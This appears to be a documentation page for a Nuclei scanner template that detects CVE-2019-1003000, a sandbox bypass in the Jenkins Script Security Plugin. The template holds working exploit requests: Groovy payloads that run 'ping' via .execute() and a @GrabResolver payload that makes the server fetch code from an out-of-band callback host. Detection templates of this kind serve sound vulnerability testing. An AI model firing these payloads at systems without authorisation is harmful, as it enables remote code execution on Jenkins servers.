Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
ID: CVE-2019-1003000
Severity: high
Author: sttlr
Tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
Description
Section titled “Description”A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
YAML Source
Section titled “YAML Source”id: CVE-2019-1003000
info: name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass author: sttlr severity: high description: | A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-1003000 cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::* reference: - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION - https://github.com/purple-WL/Jenkins_CVE-2019-1003000 - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc metadata: verified: true max-request: 6 vendor: jenkins product: script_security tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
variables: username: admin vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}" app_name: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && (http(3) || http(4))
http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body words: - "jenkins" internal: true case-insensitive: true
- raw: - | POST /j_acegi_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
- | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains_all(tolower(body_2), "jenkins", "/logout")' internal: true
- raw: - | GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 Host: {{Hostname}}
- | GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 Host: {{Hostname}}
stop-at-first-match: true matchers: - type: word part: interactsh_protocol words: - "dns"
- raw: - | GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: interactsh_request words: - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"# digest: 4a0a00473045022100ba9cb9287816c41fcab815d63f60c018d53cfeceab37067725ef6272d6ec96ac022007dec33d8f023a27baa78b973ba1e52d4d54caf5be21df03bd1c406ae708f047:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-1003000.yaml"